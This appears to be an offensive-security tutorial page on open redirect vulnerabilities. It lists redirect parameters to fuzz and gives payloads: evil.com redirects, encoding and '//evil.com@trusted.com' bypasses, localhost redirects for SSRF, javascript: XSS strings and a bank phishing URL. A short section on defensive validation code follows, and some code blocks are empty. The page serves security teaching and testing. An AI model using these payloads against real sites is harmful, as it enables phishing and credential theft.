# Open Redirect {% tabs %} {% tab title="Support VeryLazyTech πŸŽ‰" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š {% endtab %} {% endtabs %} ## **Basic info - Open Redirect** **Open Redirect** (also known as **Unvalidated Redirects and Forwards**) occurs when a web application accepts user-supplied input and redirects the user to an arbitrary URL without proper validation. {% embed url="" %} ### How to find entry points to test? * Burp Proxy history & Burp Sitemap (look at URLs with parameters) * Google dorking. E.g: `inurl:redirectUrl=http site:target.com` * Functionalities usually associated with redirects: * Login, Logout, Register & Password reset pages * Change site language * Links in emails * Read JavaScript code * Bruteforcing * Look for hidden redirect parameters, for e.g.: * `/redirect?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}` * `/?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}` ### Responses to look for when fuzzing * HTTP redirect status codes * [300 Multiple Choices](https://httpstatuses.com/300) * [301 Moved Permanently](https://httpstatuses.com/301) * [302 Found](https://httpstatuses.com/302) * [303 See Other](https://httpstatuses.com/303) * [304 Not Modified](https://httpstatuses.com/304) * [305 Use Proxy](https://httpstatuses.com/305) * [307 Temporary Redirect](https://httpstatuses.com/307) * [308 Permanent Redirect](https://httpstatuses.com/308) * Alert box popping up *** ## Tips * Try using the same parameter twice: `?next=whitelisted.com&next=google.com` * If periods filtered, use an IPv4 address in decimal notation * Try a double-URL and triple-URL encoded version of payloads * Try redirecting to an IP address (instead of a domain) using [different notations](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf): IPv6, IPv4 in decimal, hex or octal * For XSS, try replacing alert(1) with prompt(1) & confirm(1) * If extension checked, try `?image_url={payload}/.jpg` * Try `target.com/?redirect_url=.uk` (or `[any_param]=.uk`). If it redirects to target.com.uk, then it’s vulnerable! target.com.uk and target.com are different domains. * Use /U+e280 RIGHT-TO-LEFT OVERRIDE: `https://whitelisted.com@%E2%80%AE@moc.elgoog` * The unicode character U+202E changes all subsequent text to be right-to-left * E.g.: *** ## **Identifying Open Redirect Vulnerabilities** ### **Common Parameters to Test** Many applications use redirection parameters like: ``` /{payload} ?next={payload} ?url={payload} ?target={payload} ?rurl={payload} ?dest={payload} ?destination={payload} ?redir={payload} ?redirect_uri={payload} ?redirect_url={payload} ?redirect={payload} /redirect/{payload} /cgi-bin/redirect.cgi?{payload} /out/{payload} /out?{payload} ?view={payload} /login?to={payload} ?image_url={payload} ?go={payload} ?return={payload} ?returnTo={payload} ?return_to={payload} ?checkout_url={payload} ?continue={payload} ?return_path={payload} success=https://www.verylazytech.com data=https://www.verylazytech.com qurl=https://www.verylazytech.com login=https://www.verylazytech.com logout=https://www.verylazytech.com ext=https://www.verylazytech.com clickurl=https://www.verylazytech.com goto=https://www.verylazytech.com rit_url=https://www.verylazytech.com forward_url=https://www.verylazytech.com @https://www.verylazytech.com forward=https://www.verylazytech.com pic=https://www.verylazytech.com callback_url=https://www.verylazytech.com jump=https://www.verylazytech.com jump_url=https://www.verylazytech.com click?u=https://www.verylazytech.com originUrl=https://www.verylazytech.com origin=https://www.verylazytech.com Url=https://www.verylazytech.com desturl=https://www.verylazytech.com u=https://www.verylazytech.com page=https://www.verylazytech.com u1=https://www.verylazytech.com action=https://www.verylazytech.com action_url=https://www.verylazytech.com Redirect=https://www.verylazytech.com sp_url=https://www.verylazytech.com service=https://www.verylazytech.com recurl=https://www.verylazytech.com j?url=https://www.verylazytech.com url=//https://www.verylazytech.com uri=https://www.verylazytech.com u=https://www.verylazytech.com allinurl:https://www.verylazytech.com q=https://www.verylazytech.com link=https://www.verylazytech.com src=https://www.verylazytech.com tc?src=https://www.verylazytech.com linkAddress=https://www.verylazytech.com location=https://www.verylazytech.com burl=https://www.verylazytech.com request=https://www.verylazytech.com backurl=https://www.verylazytech.com RedirectUrl=https://www.verylazytech.com Redirect=https://www.verylazytech.com ReturnUrl=https://www.verylazytech.com ``` If these parameters are processed without validation, they might be vulnerable. ### **Passive Detection** 1. **Check URL parameters** – Look for redirect-related keywords in URLs. 2. **Analyze HTTP responses** – Look for **302 Found** or **301 Moved Permanently** responses. 3. **Check developer console (F12) and network traffic** – Inspect redirects. ### **Active Testing (Manual and Automated)** * **Modify the URL and inject external domains**: ``` https://example.com/login?redirect=https://evil.com ``` * **Using Burp Suite's Intruder to fuzz redirection parameters**. * **Using tools like Oralyzer**: ``` python3 oralyzer.py -u "https://example.com?redirect=" ``` *** ## **Exploiting Open Redirect Vulnerabilities** ### **Basic Open Redirect Exploitation** If an application blindly trusts user input, you can redirect a victim to a malicious website: ``` https://example.com/login?redirect=http://evil.com ``` or use encoded URLs: ``` https://example.com/login?redirect=%68%74%74%70%3a%2f%2fevil.com ``` ### **Redirect to Localhost (Bypass Authentication)** If an application allows redirection to localhost: ``` https://example.com/login?redirect=http://127.0.0.1 ``` It can be used to: * Redirect an admin panel login to an internal resource. * Exploit internal APIs (in SSRF attacks). ### **URL Format Bypass** Some applications attempt to restrict external domains but allow different URL formats: ``` https://example.com/login?redirect=//evil.com https://example.com/login?redirect=//evil.com@trusted.com ``` * `//evil.com` is a shorthand for `https://evil.com`. * `@trusted.com` is ignored by some browsers. *** ## **Open Redirect to XSS** Some browsers allow **JavaScript-based redirects** if improperly filtered. ### **Basic Payloads** ```javascript javascript:alert(1) ``` or bypassing `javascript` filters: ```javascript java%0d%0ascript%0d%0a:alert(0) ``` ### **Using Comments and Encoding** ```javascript javascript://sub.domain.com/%0Aalert(1) javascript://%250Aalert(1) javascript://%250A1?alert(1):0 ``` ### **SVG File Exploit (Open Redirect via File Upload)** Some applications allow uploading **SVG files** that can trigger JavaScript execution: ```xml ``` If the website automatically loads SVG files, the redirection will be triggered. *** ## **Exploiting Open Redirect for Phishing** Attackers can craft **realistic-looking URLs** to trick users: ``` https://bank.com?redirect=https://bank.com.evil.com ``` Users might not notice the difference and enter their credentials. *** ## **Tools for Automating Open Redirect Testing** ### **Oralyzer (Automated Open Redirect Scanner)** * GitHub: * Run the tool: ```bash python3 oralyzer.py -u "https://example.com?redirect=" ``` ### **Fuzzing with Payload Lists** * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) *** ## **Defense Against Open Redirects** ### **Input Validation** * Only allow **whitelisted domains** for redirection: ```python allowed_domains = ["mysafedomain.com"] if parsed_url.netloc not in allowed_domains: return "Invalid redirect URL" ``` ### **Use Relative URLs Instead of Absolute** Instead of: ```php header("Location: ".$_GET['redirect']); ``` Use: ```php header("Location: /dashboard"); ``` ### **URL Sanitization** Ensure the redirect URL starts with a trusted domain: ```php if (!preg_match("/^https:\/\/mysafedomain\.com/", $_GET['redirect'])) { die("Invalid redirect URL"); } ``` *** ## Code examples **.Net** ```bash response.redirect("~/mysafe-subdomain/login.aspx") ``` **Java** ```bash response.redirect("http://www.verylazytech.com"); ``` **PHP** ```php ``` *** {% hint style="success" %} Learn & practice [**For the OSCP.**](https://shop.verylazytech.com)
Support VeryLazyTech πŸŽ‰ * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š
{% endhint %}